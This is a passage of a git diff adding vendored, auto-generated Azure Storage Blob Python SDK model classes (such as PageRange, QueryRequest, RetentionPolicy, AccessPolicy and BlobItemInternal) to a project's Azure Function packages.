+ + _attribute_map = { + 'page_range': {'key': 'PageRange', 'type': '[PageRange]'}, + 'clear_range': {'key': 'ClearRange', 'type': '[ClearRange]'}, + 'next_marker': {'key': 'NextMarker', 'type': 'str'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword page_range: + :paramtype page_range: list[~azure.storage.blob.models.PageRange] + :keyword clear_range: + :paramtype clear_range: list[~azure.storage.blob.models.ClearRange] + :keyword next_marker: + :paramtype next_marker: str + """ + super(PageList, self).__init__(**kwargs) + self.page_range = kwargs.get('page_range', None) + self.clear_range = kwargs.get('clear_range', None) + self.next_marker = kwargs.get('next_marker', None) + + +class PageRange(msrest.serialization.Model): + """PageRange. + + All required parameters must be populated in order to send to Azure. + + :ivar start: Required. + :vartype start: long + :ivar end: Required. + :vartype end: long + """ + + _validation = { + 'start': {'required': True}, + 'end': {'required': True}, + } + + _attribute_map = { + 'start': {'key': 'Start', 'type': 'long', 'xml': {'name': 'Start'}}, + 'end': {'key': 'End', 'type': 'long', 'xml': {'name': 'End'}}, + } + _xml_map = { + 'name': 'PageRange' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword start: Required. + :paramtype start: long + :keyword end: Required. + :paramtype end: long + """ + super(PageRange, self).__init__(**kwargs) + self.start = kwargs['start'] + self.end = kwargs['end'] + + +class QueryFormat(msrest.serialization.Model): + """QueryFormat. + + All required parameters must be populated in order to send to Azure. + + :ivar type: Required. The quick query format type. Possible values include: "delimited", + "json", "arrow", "parquet". + :vartype type: str or ~azure.storage.blob.models.QueryFormatType + :ivar delimited_text_configuration: Groups the settings used for interpreting the blob data if + the blob is delimited text formatted. + :vartype delimited_text_configuration: ~azure.storage.blob.models.DelimitedTextConfiguration + :ivar json_text_configuration: json text configuration. + :vartype json_text_configuration: ~azure.storage.blob.models.JsonTextConfiguration + :ivar arrow_configuration: Groups the settings used for formatting the response if the response + should be Arrow formatted. + :vartype arrow_configuration: ~azure.storage.blob.models.ArrowConfiguration + :ivar parquet_text_configuration: Any object. + :vartype parquet_text_configuration: any + """ + + _validation = { + 'type': {'required': True}, + } + + _attribute_map = { + 'type': {'key': 'Type', 'type': 'str', 'xml': {'name': 'Type'}}, + 'delimited_text_configuration': {'key': 'DelimitedTextConfiguration', 'type': 'DelimitedTextConfiguration'}, + 'json_text_configuration': {'key': 'JsonTextConfiguration', 'type': 'JsonTextConfiguration'}, + 'arrow_configuration': {'key': 'ArrowConfiguration', 'type': 'ArrowConfiguration'}, + 'parquet_text_configuration': {'key': 'ParquetTextConfiguration', 'type': 'object'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword type: Required. The quick query format type. Possible values include: "delimited", + "json", "arrow", "parquet". + :paramtype type: str or ~azure.storage.blob.models.QueryFormatType + :keyword delimited_text_configuration: Groups the settings used for interpreting the blob data + if the blob is delimited text formatted. + :paramtype delimited_text_configuration: ~azure.storage.blob.models.DelimitedTextConfiguration + :keyword json_text_configuration: json text configuration. + :paramtype json_text_configuration: ~azure.storage.blob.models.JsonTextConfiguration + :keyword arrow_configuration: Groups the settings used for formatting the response if the + response should be Arrow formatted. + :paramtype arrow_configuration: ~azure.storage.blob.models.ArrowConfiguration + :keyword parquet_text_configuration: Any object. + :paramtype parquet_text_configuration: any + """ + super(QueryFormat, self).__init__(**kwargs) + self.type = kwargs['type'] + self.delimited_text_configuration = kwargs.get('delimited_text_configuration', None) + self.json_text_configuration = kwargs.get('json_text_configuration', None) + self.arrow_configuration = kwargs.get('arrow_configuration', None) + self.parquet_text_configuration = kwargs.get('parquet_text_configuration', None) + + +class QueryRequest(msrest.serialization.Model): + """Groups the set of query request settings. + + Variables are only populated by the server, and will be ignored when sending a request. + + All required parameters must be populated in order to send to Azure. + + :ivar query_type: Required. The type of the provided query expression. Has constant value: + "SQL". + :vartype query_type: str + :ivar expression: Required. The query expression in SQL. The maximum size of the query + expression is 256KiB. + :vartype expression: str + :ivar input_serialization: + :vartype input_serialization: ~azure.storage.blob.models.QuerySerialization + :ivar output_serialization: + :vartype output_serialization: ~azure.storage.blob.models.QuerySerialization + """ + + _validation = { + 'query_type': {'required': True, 'constant': True}, + 'expression': {'required': True}, + } + + _attribute_map = { + 'query_type': {'key': 'QueryType', 'type': 'str', 'xml': {'name': 'QueryType'}}, + 'expression': {'key': 'Expression', 'type': 'str', 'xml': {'name': 'Expression'}}, + 'input_serialization': {'key': 'InputSerialization', 'type': 'QuerySerialization'}, + 'output_serialization': {'key': 'OutputSerialization', 'type': 'QuerySerialization'}, + } + _xml_map = { + 'name': 'QueryRequest' + } + + query_type = "SQL" + + def __init__( + self, + **kwargs + ): + """ + :keyword expression: Required. The query expression in SQL. The maximum size of the query + expression is 256KiB. + :paramtype expression: str + :keyword input_serialization: + :paramtype input_serialization: ~azure.storage.blob.models.QuerySerialization + :keyword output_serialization: + :paramtype output_serialization: ~azure.storage.blob.models.QuerySerialization + """ + super(QueryRequest, self).__init__(**kwargs) + self.expression = kwargs['expression'] + self.input_serialization = kwargs.get('input_serialization', None) + self.output_serialization = kwargs.get('output_serialization', None) + + +class QuerySerialization(msrest.serialization.Model): + """QuerySerialization. + + All required parameters must be populated in order to send to Azure. + + :ivar format: Required. + :vartype format: ~azure.storage.blob.models.QueryFormat + """ + + _validation = { + 'format': {'required': True}, + } + + _attribute_map = { + 'format': {'key': 'Format', 'type': 'QueryFormat'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword format: Required. + :paramtype format: ~azure.storage.blob.models.QueryFormat + """ + super(QuerySerialization, self).__init__(**kwargs) + self.format = kwargs['format'] + + +class RetentionPolicy(msrest.serialization.Model): + """the retention policy which determines how long the associated data should persist. + + All required parameters must be populated in order to send to Azure. + + :ivar enabled: Required. Indicates whether a retention policy is enabled for the storage + service. + :vartype enabled: bool + :ivar days: Indicates the number of days that metrics or logging or soft-deleted data should be + retained. All data older than this value will be deleted. + :vartype days: int + :ivar allow_permanent_delete: Indicates whether permanent delete is allowed on this storage + account. + :vartype allow_permanent_delete: bool + """ + + _validation = { + 'enabled': {'required': True}, + 'days': {'minimum': 1}, + } + + _attribute_map = { + 'enabled': {'key': 'Enabled', 'type': 'bool'}, + 'days': {'key': 'Days', 'type': 'int'}, + 'allow_permanent_delete': {'key': 'AllowPermanentDelete', 'type': 'bool'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword enabled: Required. Indicates whether a retention policy is enabled for the storage + service. + :paramtype enabled: bool + :keyword days: Indicates the number of days that metrics or logging or soft-deleted data should + be retained. All data older than this value will be deleted. + :paramtype days: int + :keyword allow_permanent_delete: Indicates whether permanent delete is allowed on this storage + account. + :paramtype allow_permanent_delete: bool + """ + super(RetentionPolicy, self).__init__(**kwargs) + self.enabled = kwargs['enabled'] + self.days = kwargs.get('days', None) + self.allow_permanent_delete = kwargs.get('allow_permanent_delete', None) + + +class SequenceNumberAccessConditions(msrest.serialization.Model): + """Parameter group. + + :ivar if_sequence_number_less_than_or_equal_to: Specify this header value to operate only on a + blob if it has a sequence number less than or equal to the specified. + :vartype if_sequence_number_less_than_or_equal_to: long + :ivar if_sequence_number_less_than: Specify this header value to operate only on a blob if it + has a sequence number less than the specified. + :vartype if_sequence_number_less_than: long + :ivar if_sequence_number_equal_to: Specify this header value to operate only on a blob if it + has the specified sequence number. + :vartype if_sequence_number_equal_to: long + """ + + _attribute_map = { + 'if_sequence_number_less_than_or_equal_to': {'key': 'ifSequenceNumberLessThanOrEqualTo', 'type': 'long'}, + 'if_sequence_number_less_than': {'key': 'ifSequenceNumberLessThan', 'type': 'long'}, + 'if_sequence_number_equal_to': {'key': 'ifSequenceNumberEqualTo', 'type': 'long'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword if_sequence_number_less_than_or_equal_to: Specify this header value to operate only on + a blob if it has a sequence number less than or equal to the specified. + :paramtype if_sequence_number_less_than_or_equal_to: long + :keyword if_sequence_number_less_than: Specify this header value to operate only on a blob if + it has a sequence number less than the specified. + :paramtype if_sequence_number_less_than: long + :keyword if_sequence_number_equal_to: Specify this header value to operate only on a blob if it + has the specified sequence number. + :paramtype if_sequence_number_equal_to: long + """ + super(SequenceNumberAccessConditions, self).__init__(**kwargs) + self.if_sequence_number_less_than_or_equal_to = kwargs.get('if_sequence_number_less_than_or_equal_to', None) + self.if_sequence_number_less_than = kwargs.get('if_sequence_number_less_than', None) + self.if_sequence_number_equal_to = kwargs.get('if_sequence_number_equal_to', None) + + +class SignedIdentifier(msrest.serialization.Model): + """signed identifier. + + All required parameters must be populated in order to send to Azure. + + :ivar id: Required. a unique id. + :vartype id: str + :ivar access_policy: An Access policy. + :vartype access_policy: ~azure.storage.blob.models.AccessPolicy + """ + + _validation = { + 'id': {'required': True}, + } + + _attribute_map = { + 'id': {'key': 'Id', 'type': 'str'}, + 'access_policy': {'key': 'AccessPolicy', 'type': 'AccessPolicy'}, + } + _xml_map = { + 'name': 'SignedIdentifier' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword id: Required. a unique id. + :paramtype id: str + :keyword access_policy: An Access policy. + :paramtype access_policy: ~azure.storage.blob.models.AccessPolicy + """ + super(SignedIdentifier, self).__init__(**kwargs) + self.id = kwargs['id'] + self.access_policy = kwargs.get('access_policy', None) + + +class SourceModifiedAccessConditions(msrest.serialization.Model): + """Parameter group. + + :ivar source_if_modified_since: Specify this header value to operate only on a blob if it has + been modified since the specified date/time. + :vartype source_if_modified_since: ~datetime.datetime + :ivar source_if_unmodified_since: Specify this header value to operate only on a blob if it has + not been modified since the specified date/time. + :vartype source_if_unmodified_since: ~datetime.datetime + :ivar source_if_match: Specify an ETag value to operate only on blobs with a matching value. + :vartype source_if_match: str + :ivar source_if_none_match: Specify an ETag value to operate only on blobs without a matching + value. + :vartype source_if_none_match: str + :ivar source_if_tags: Specify a SQL where clause on blob tags to operate only on blobs with a + matching value. + :vartype source_if_tags: str + """ + + _attribute_map = { + 'source_if_modified_since': {'key': 'sourceIfModifiedSince', 'type': 'rfc-1123'}, + 'source_if_unmodified_since': {'key': 'sourceIfUnmodifiedSince', 'type': 'rfc-1123'}, + 'source_if_match': {'key': 'sourceIfMatch', 'type': 'str'}, + 'source_if_none_match': {'key': 'sourceIfNoneMatch', 'type': 'str'}, + 'source_if_tags': {'key': 'sourceIfTags', 'type': 'str'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword source_if_modified_since: Specify this header value to operate only on a blob if it + has been modified since the specified date/time. + :paramtype source_if_modified_since: ~datetime.datetime + :keyword source_if_unmodified_since: Specify this header value to operate only on a blob if it + has not been modified since the specified date/time. + :paramtype source_if_unmodified_since: ~datetime.datetime + :keyword source_if_match: Specify an ETag value to operate only on blobs with a matching value. + :paramtype source_if_match: str + :keyword source_if_none_match: Specify an ETag value to operate only on blobs without a + matching value. + :paramtype source_if_none_match: str + :keyword source_if_tags: Specify a SQL where clause on blob tags to operate only on blobs with + a matching value. + :paramtype source_if_tags: str + """ + super(SourceModifiedAccessConditions, self).__init__(**kwargs) + self.source_if_modified_since = kwargs.get('source_if_modified_since', None) + self.source_if_unmodified_since = kwargs.get('source_if_unmodified_since', None) + self.source_if_match = kwargs.get('source_if_match', None) + self.source_if_none_match = kwargs.get('source_if_none_match', None) + self.source_if_tags = kwargs.get('source_if_tags', None) + + +class StaticWebsite(msrest.serialization.Model): + """The properties that enable an account to host a static website. + + All required parameters must be populated in order to send to Azure. + + :ivar enabled: Required. Indicates whether this account is hosting a static website. + :vartype enabled: bool + :ivar index_document: The default name of the index page under each directory. + :vartype index_document: str + :ivar error_document404_path: The absolute path of the custom 404 page. + :vartype error_document404_path: str + :ivar default_index_document_path: Absolute path of the default index page. + :vartype default_index_document_path: str + """ + + _validation = { + 'enabled': {'required': True}, + } + + _attribute_map = { + 'enabled': {'key': 'Enabled', 'type': 'bool'}, + 'index_document': {'key': 'IndexDocument', 'type': 'str'}, + 'error_document404_path': {'key': 'ErrorDocument404Path', 'type': 'str'}, + 'default_index_document_path': {'key': 'DefaultIndexDocumentPath', 'type': 'str'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword enabled: Required. Indicates whether this account is hosting a static website. + :paramtype enabled: bool + :keyword index_document: The default name of the index page under each directory. + :paramtype index_document: str + :keyword error_document404_path: The absolute path of the custom 404 page. + :paramtype error_document404_path: str + :keyword default_index_document_path: Absolute path of the default index page. + :paramtype default_index_document_path: str + """ + super(StaticWebsite, self).__init__(**kwargs) + self.enabled = kwargs['enabled'] + self.index_document = kwargs.get('index_document', None) + self.error_document404_path = kwargs.get('error_document404_path', None) + self.default_index_document_path = kwargs.get('default_index_document_path', None) + + +class StorageError(msrest.serialization.Model): + """StorageError. + + :ivar message: + :vartype message: str + """ + + _attribute_map = { + 'message': {'key': 'Message', 'type': 'str'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword message: + :paramtype message: str + """ + super(StorageError, self).__init__(**kwargs) + self.message = kwargs.get('message', None) + + +class StorageServiceProperties(msrest.serialization.Model): + """Storage Service Properties. + + :ivar logging: Azure Analytics Logging settings. + :vartype logging: ~azure.storage.blob.models.Logging + :ivar hour_metrics: a summary of request statistics grouped by API in hour or minute aggregates + for blobs. + :vartype hour_metrics: ~azure.storage.blob.models.Metrics + :ivar minute_metrics: a summary of request statistics grouped by API in hour or minute + aggregates for blobs. + :vartype minute_metrics: ~azure.storage.blob.models.Metrics + :ivar cors: The set of CORS rules. + :vartype cors: list[~azure.storage.blob.models.CorsRule] + :ivar default_service_version: The default version to use for requests to the Blob service if + an incoming request's version is not specified. Possible values include version 2008-10-27 and + all more recent versions. + :vartype default_service_version: str + :ivar delete_retention_policy: the retention policy which determines how long the associated + data should persist. + :vartype delete_retention_policy: ~azure.storage.blob.models.RetentionPolicy + :ivar static_website: The properties that enable an account to host a static website. + :vartype static_website: ~azure.storage.blob.models.StaticWebsite + """ + + _attribute_map = { + 'logging': {'key': 'Logging', 'type': 'Logging'}, + 'hour_metrics': {'key': 'HourMetrics', 'type': 'Metrics'}, + 'minute_metrics': {'key': 'MinuteMetrics', 'type': 'Metrics'}, + 'cors': {'key': 'Cors', 'type': '[CorsRule]', 'xml': {'wrapped': True}}, + 'default_service_version': {'key': 'DefaultServiceVersion', 'type': 'str'}, + 'delete_retention_policy': {'key': 'DeleteRetentionPolicy', 'type': 'RetentionPolicy'}, + 'static_website': {'key': 'StaticWebsite', 'type': 'StaticWebsite'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword logging: Azure Analytics Logging settings. + :paramtype logging: ~azure.storage.blob.models.Logging + :keyword hour_metrics: a summary of request statistics grouped by API in hour or minute + aggregates for blobs. + :paramtype hour_metrics: ~azure.storage.blob.models.Metrics + :keyword minute_metrics: a summary of request statistics grouped by API in hour or minute + aggregates for blobs. + :paramtype minute_metrics: ~azure.storage.blob.models.Metrics + :keyword cors: The set of CORS rules. + :paramtype cors: list[~azure.storage.blob.models.CorsRule] + :keyword default_service_version: The default version to use for requests to the Blob service + if an incoming request's version is not specified. Possible values include version 2008-10-27 + and all more recent versions. + :paramtype default_service_version: str + :keyword delete_retention_policy: the retention policy which determines how long the associated + data should persist. + :paramtype delete_retention_policy: ~azure.storage.blob.models.RetentionPolicy + :keyword static_website: The properties that enable an account to host a static website. + :paramtype static_website: ~azure.storage.blob.models.StaticWebsite + """ + super(StorageServiceProperties, self).__init__(**kwargs) + self.logging = kwargs.get('logging', None) + self.hour_metrics = kwargs.get('hour_metrics', None) + self.minute_metrics = kwargs.get('minute_metrics', None) + self.cors = kwargs.get('cors', None) + self.default_service_version = kwargs.get('default_service_version', None) + self.delete_retention_policy = kwargs.get('delete_retention_policy', None) + self.static_website = kwargs.get('static_website', None) + + +class StorageServiceStats(msrest.serialization.Model): + """Stats for the storage service. + + :ivar geo_replication: Geo-Replication information for the Secondary Storage Service. + :vartype geo_replication: ~azure.storage.blob.models.GeoReplication + """ + + _attribute_map = { + 'geo_replication': {'key': 'GeoReplication', 'type': 'GeoReplication'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword geo_replication: Geo-Replication information for the Secondary Storage Service. + :paramtype geo_replication: ~azure.storage.blob.models.GeoReplication + """ + super(StorageServiceStats, self).__init__(**kwargs) + self.geo_replication = kwargs.get('geo_replication', None) + + +class UserDelegationKey(msrest.serialization.Model): + """A user delegation key. + + All required parameters must be populated in order to send to Azure. + + :ivar signed_oid: Required. The Azure Active Directory object ID in GUID format. + :vartype signed_oid: str + :ivar signed_tid: Required. The Azure Active Directory tenant ID in GUID format. + :vartype signed_tid: str + :ivar signed_start: Required. The date-time the key is active. + :vartype signed_start: ~datetime.datetime + :ivar signed_expiry: Required. The date-time the key expires. + :vartype signed_expiry: ~datetime.datetime + :ivar signed_service: Required. Abbreviation of the Azure Storage service that accepts the key. + :vartype signed_service: str + :ivar signed_version: Required. The service version that created the key. + :vartype signed_version: str + :ivar value: Required. The key as a base64 string. + :vartype value: str + """ + + _validation = { + 'signed_oid': {'required': True}, + 'signed_tid': {'required': True}, + 'signed_start': {'required': True}, + 'signed_expiry': {'required': True}, + 'signed_service': {'required': True}, + 'signed_version': {'required': True}, + 'value': {'required': True}, + } + + _attribute_map = { + 'signed_oid': {'key': 'SignedOid', 'type': 'str'}, + 'signed_tid': {'key': 'SignedTid', 'type': 'str'}, + 'signed_start': {'key': 'SignedStart', 'type': 'iso-8601'}, + 'signed_expiry': {'key': 'SignedExpiry', 'type': 'iso-8601'}, + 'signed_service': {'key': 'SignedService', 'type': 'str'}, + 'signed_version': {'key': 'SignedVersion', 'type': 'str'}, + 'value': {'key': 'Value', 'type': 'str'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword signed_oid: Required. The Azure Active Directory object ID in GUID format. + :paramtype signed_oid: str + :keyword signed_tid: Required. The Azure Active Directory tenant ID in GUID format. + :paramtype signed_tid: str + :keyword signed_start: Required. The date-time the key is active. + :paramtype signed_start: ~datetime.datetime + :keyword signed_expiry: Required. The date-time the key expires. + :paramtype signed_expiry: ~datetime.datetime + :keyword signed_service: Required. Abbreviation of the Azure Storage service that accepts the + key. + :paramtype signed_service: str + :keyword signed_version: Required. The service version that created the key. + :paramtype signed_version: str + :keyword value: Required. The key as a base64 string. + :paramtype value: str + """ + super(UserDelegationKey, self).__init__(**kwargs) + self.signed_oid = kwargs['signed_oid'] + self.signed_tid = kwargs['signed_tid'] + self.signed_start = kwargs['signed_start'] + self.signed_expiry = kwargs['signed_expiry'] + self.signed_service = kwargs['signed_service'] + self.signed_version = kwargs['signed_version'] + self.value = kwargs['value'] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/_models_py3.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/_models_py3.py new file mode 100644 index 0000000..b66512c --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/models/_models_py3.py @@ -0,0 +1,2871 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- + +import datetime +from typing import Any, Dict, List, Optional, Union + +from azure.core.exceptions import HttpResponseError +import msrest.serialization + +from ._azure_blob_storage_enums import * + + +class AccessPolicy(msrest.serialization.Model): + """An Access policy. + + :ivar start: the date-time the policy is active. + :vartype start: str + :ivar expiry: the date-time the policy expires. + :vartype expiry: str + :ivar permission: the permissions for the acl policy. + :vartype permission: str + """ + + _attribute_map = { + 'start': {'key': 'Start', 'type': 'str'}, + 'expiry': {'key': 'Expiry', 'type': 'str'}, + 'permission': {'key': 'Permission', 'type': 'str'}, + } + + def __init__( + self, + *, + start: Optional[str] = None, + expiry: Optional[str] = None, + permission: Optional[str] = None, + **kwargs + ): + """ + :keyword start: the date-time the policy is active. + :paramtype start: str + :keyword expiry: the date-time the policy expires. + :paramtype expiry: str + :keyword permission: the permissions for the acl policy. + :paramtype permission: str + """ + super(AccessPolicy, self).__init__(**kwargs) + self.start = start + self.expiry = expiry + self.permission = permission + + +class AppendPositionAccessConditions(msrest.serialization.Model): + """Parameter group. + + :ivar max_size: Optional conditional header. The max length in bytes permitted for the append + blob. If the Append Block operation would cause the blob to exceed that limit or if the blob + size is already greater than the value specified in this header, the request will fail with + MaxBlobSizeConditionNotMet error (HTTP status code 412 - Precondition Failed). + :vartype max_size: long + :ivar append_position: Optional conditional header, used only for the Append Block operation. A + number indicating the byte offset to compare. Append Block will succeed only if the append + position is equal to this number. If it is not, the request will fail with the + AppendPositionConditionNotMet error (HTTP status code 412 - Precondition Failed). + :vartype append_position: long + """ + + _attribute_map = { + 'max_size': {'key': 'maxSize', 'type': 'long'}, + 'append_position': {'key': 'appendPosition', 'type': 'long'}, + } + + def __init__( + self, + *, + max_size: Optional[int] = None, + append_position: Optional[int] = None, + **kwargs + ): + """ + :keyword max_size: Optional conditional header. The max length in bytes permitted for the + append blob. If the Append Block operation would cause the blob to exceed that limit or if the + blob size is already greater than the value specified in this header, the request will fail + with MaxBlobSizeConditionNotMet error (HTTP status code 412 - Precondition Failed). + :paramtype max_size: long + :keyword append_position: Optional conditional header, used only for the Append Block + operation. A number indicating the byte offset to compare. Append Block will succeed only if + the append position is equal to this number. If it is not, the request will fail with the + AppendPositionConditionNotMet error (HTTP status code 412 - Precondition Failed). + :paramtype append_position: long + """ + super(AppendPositionAccessConditions, self).__init__(**kwargs) + self.max_size = max_size + self.append_position = append_position + + +class ArrowConfiguration(msrest.serialization.Model): + """Groups the settings used for formatting the response if the response should be Arrow formatted. + + All required parameters must be populated in order to send to Azure. + + :ivar schema: Required. + :vartype schema: list[~azure.storage.blob.models.ArrowField] + """ + + _validation = { + 'schema': {'required': True}, + } + + _attribute_map = { + 'schema': {'key': 'Schema', 'type': '[ArrowField]', 'xml': {'name': 'Schema', 'wrapped': True, 'itemsName': 'Field'}}, + } + _xml_map = { + 'name': 'ArrowConfiguration' + } + + def __init__( + self, + *, + schema: List["ArrowField"], + **kwargs + ): + """ + :keyword schema: Required. + :paramtype schema: list[~azure.storage.blob.models.ArrowField] + """ + super(ArrowConfiguration, self).__init__(**kwargs) + self.schema = schema + + +class ArrowField(msrest.serialization.Model): + """Groups settings regarding specific field of an arrow schema. + + All required parameters must be populated in order to send to Azure. + + :ivar type: Required. + :vartype type: str + :ivar name: + :vartype name: str + :ivar precision: + :vartype precision: int + :ivar scale: + :vartype scale: int + """ + + _validation = { + 'type': {'required': True}, + } + + _attribute_map = { + 'type': {'key': 'Type', 'type': 'str'}, + 'name': {'key': 'Name', 'type': 'str'}, + 'precision': {'key': 'Precision', 'type': 'int'}, + 'scale': {'key': 'Scale', 'type': 'int'}, + } + _xml_map = { + 'name': 'Field' + } + + def __init__( + self, + *, + type: str, + name: Optional[str] = None, + precision: Optional[int] = None, + scale: Optional[int] = None, + **kwargs + ): + """ + :keyword type: Required. + :paramtype type: str + :keyword name: + :paramtype name: str + :keyword precision: + :paramtype precision: int + :keyword scale: + :paramtype scale: int + """ + super(ArrowField, self).__init__(**kwargs) + self.type = type + self.name = name + self.precision = precision + self.scale = scale + + +class BlobFlatListSegment(msrest.serialization.Model): + """BlobFlatListSegment. + + All required parameters must be populated in order to send to Azure. + + :ivar blob_items: Required. + :vartype blob_items: list[~azure.storage.blob.models.BlobItemInternal] + """ + + _validation = { + 'blob_items': {'required': True}, + } + + _attribute_map = { + 'blob_items': {'key': 'BlobItems', 'type': '[BlobItemInternal]'}, + } + _xml_map = { + 'name': 'Blobs' + } + + def __init__( + self, + *, + blob_items: List["BlobItemInternal"], + **kwargs + ): + """ + :keyword blob_items: Required. + :paramtype blob_items: list[~azure.storage.blob.models.BlobItemInternal] + """ + super(BlobFlatListSegment, self).__init__(**kwargs) + self.blob_items = blob_items + + +class BlobHierarchyListSegment(msrest.serialization.Model): + """BlobHierarchyListSegment. + + All required parameters must be populated in order to send to Azure. + + :ivar blob_prefixes: + :vartype blob_prefixes: list[~azure.storage.blob.models.BlobPrefix] + :ivar blob_items: Required. + :vartype blob_items: list[~azure.storage.blob.models.BlobItemInternal] + """ + + _validation = { + 'blob_items': {'required': True}, + } + + _attribute_map = { + 'blob_prefixes': {'key': 'BlobPrefixes', 'type': '[BlobPrefix]', 'xml': {'name': 'BlobPrefix'}}, + 'blob_items': {'key': 'BlobItems', 'type': '[BlobItemInternal]', 'xml': {'name': 'Blob', 'itemsName': 'Blob'}}, + } + _xml_map = { + 'name': 'Blobs' + } + + def __init__( + self, + *, + blob_items: List["BlobItemInternal"], + blob_prefixes: Optional[List["BlobPrefix"]] = None, + **kwargs + ): + """ + :keyword blob_prefixes: + :paramtype blob_prefixes: list[~azure.storage.blob.models.BlobPrefix] + :keyword blob_items: Required. + :paramtype blob_items: list[~azure.storage.blob.models.BlobItemInternal] + """ + super(BlobHierarchyListSegment, self).__init__(**kwargs) + self.blob_prefixes = blob_prefixes + self.blob_items = blob_items + + +class BlobHTTPHeaders(msrest.serialization.Model): + """Parameter group. + + :ivar blob_cache_control: Optional. Sets the blob's cache control. If specified, this property + is stored with the blob and returned with a read request. + :vartype blob_cache_control: str + :ivar blob_content_type: Optional. Sets the blob's content type. If specified, this property is + stored with the blob and returned with a read request. + :vartype blob_content_type: str + :ivar blob_content_md5: Optional. An MD5 hash of the blob content. Note that this hash is not + validated, as the hashes for the individual blocks were validated when each was uploaded. + :vartype blob_content_md5: bytearray + :ivar blob_content_encoding: Optional. Sets the blob's content encoding. If specified, this + property is stored with the blob and returned with a read request. + :vartype blob_content_encoding: str + :ivar blob_content_language: Optional. Set the blob's content language. If specified, this + property is stored with the blob and returned with a read request. + :vartype blob_content_language: str + :ivar blob_content_disposition: Optional. Sets the blob's Content-Disposition header. + :vartype blob_content_disposition: str + """ + + _attribute_map = { + 'blob_cache_control': {'key': 'blobCacheControl', 'type': 'str'}, + 'blob_content_type': {'key': 'blobContentType', 'type': 'str'}, + 'blob_content_md5': {'key': 'blobContentMD5', 'type': 'bytearray'}, + 'blob_content_encoding': {'key': 'blobContentEncoding', 'type': 'str'}, + 'blob_content_language': {'key': 'blobContentLanguage', 'type': 'str'}, + 'blob_content_disposition': {'key': 'blobContentDisposition', 'type': 'str'}, + } + + def __init__( + self, + *, + blob_cache_control: Optional[str] = None, + blob_content_type: Optional[str] = None, + blob_content_md5: Optional[bytearray] = None, + blob_content_encoding: Optional[str] = None, + blob_content_language: Optional[str] = None, + blob_content_disposition: Optional[str] = None, + **kwargs + ): + """ + :keyword blob_cache_control: Optional. Sets the blob's cache control. If specified, this + property is stored with the blob and returned with a read request. + :paramtype blob_cache_control: str + :keyword blob_content_type: Optional. Sets the blob's content type. If specified, this property + is stored with the blob and returned with a read request. + :paramtype blob_content_type: str + :keyword blob_content_md5: Optional. An MD5 hash of the blob content. Note that this hash is + not validated, as the hashes for the individual blocks were validated when each was uploaded. + :paramtype blob_content_md5: bytearray + :keyword blob_content_encoding: Optional. Sets the blob's content encoding. If specified, this + property is stored with the blob and returned with a read request. + :paramtype blob_content_encoding: str + :keyword blob_content_language: Optional. Set the blob's content language. If specified, this + property is stored with the blob and returned with a read request. + :paramtype blob_content_language: str + :keyword blob_content_disposition: Optional. Sets the blob's Content-Disposition header. + :paramtype blob_content_disposition: str + """ + super(BlobHTTPHeaders, self).__init__(**kwargs) + self.blob_cache_control = blob_cache_control + self.blob_content_type = blob_content_type + self.blob_content_md5 = blob_content_md5 + self.blob_content_encoding = blob_content_encoding + self.blob_content_language = blob_content_language + self.blob_content_disposition = blob_content_disposition + + +class BlobItemInternal(msrest.serialization.Model): + """An Azure Storage blob. + + All required parameters must be populated in order to send to Azure. + + :ivar name: Required. + :vartype name: ~azure.storage.blob.models.BlobName + :ivar deleted: Required. + :vartype deleted: bool + :ivar snapshot: Required. + :vartype snapshot: str + :ivar version_id: + :vartype version_id: str + :ivar is_current_version: + :vartype is_current_version: bool + :ivar properties: Required. Properties of a blob. + :vartype properties: ~azure.storage.blob.models.BlobPropertiesInternal + :ivar metadata: + :vartype metadata: ~azure.storage.blob.models.BlobMetadata + :ivar blob_tags: Blob tags. + :vartype blob_tags: ~azure.storage.blob.models.BlobTags + :ivar has_versions_only: + :vartype has_versions_only: bool + :ivar object_replication_metadata: Dictionary of :code:``. + :vartype object_replication_metadata: dict[str, str] + """ + + _validation = { + 'name': {'required': True}, + 'deleted': {'required': True}, + 'snapshot': {'required': True}, + 'properties': {'required': True}, + } + + _attribute_map = { + 'name': {'key': 'Name', 'type': 'BlobName'}, + 'deleted': {'key': 'Deleted', 'type': 'bool'}, + 'snapshot': {'key': 'Snapshot', 'type': 'str'}, + 'version_id': {'key': 'VersionId', 'type': 'str'}, + 'is_current_version': {'key': 'IsCurrentVersion', 'type': 'bool'}, + 'properties': {'key': 'Properties', 'type': 'BlobPropertiesInternal'}, + 'metadata': {'key': 'Metadata', 'type': 'BlobMetadata'}, + 'blob_tags': {'key': 'BlobTags', 'type': 'BlobTags'}, + 'has_versions_only': {'key': 'HasVersionsOnly', 'type': 'bool'}, + 'object_replication_metadata': {'key': 'OrMetadata', 'type': '{str}'}, + } + _xml_map = { + 'name': 'Blob' + } + + def __init__( + self, + *, + name: "BlobName", + deleted: bool, + snapshot: str, + properties: "BlobPropertiesInternal", + version_id: Optional[str] = None, + is_current_version: Optional[bool] = None, + metadata: Optional["BlobMetadata"] = None, + blob_tags: Optional["BlobTags"] = None, + has_versions_only: Optional[bool] = None, + object_replication_metadata: Optional[Dict[str, str]] = None, + **kwargs + ): + """ + :keyword name: Required. + :paramtype name: ~azure.storage.blob.models.BlobName + :keyword deleted: 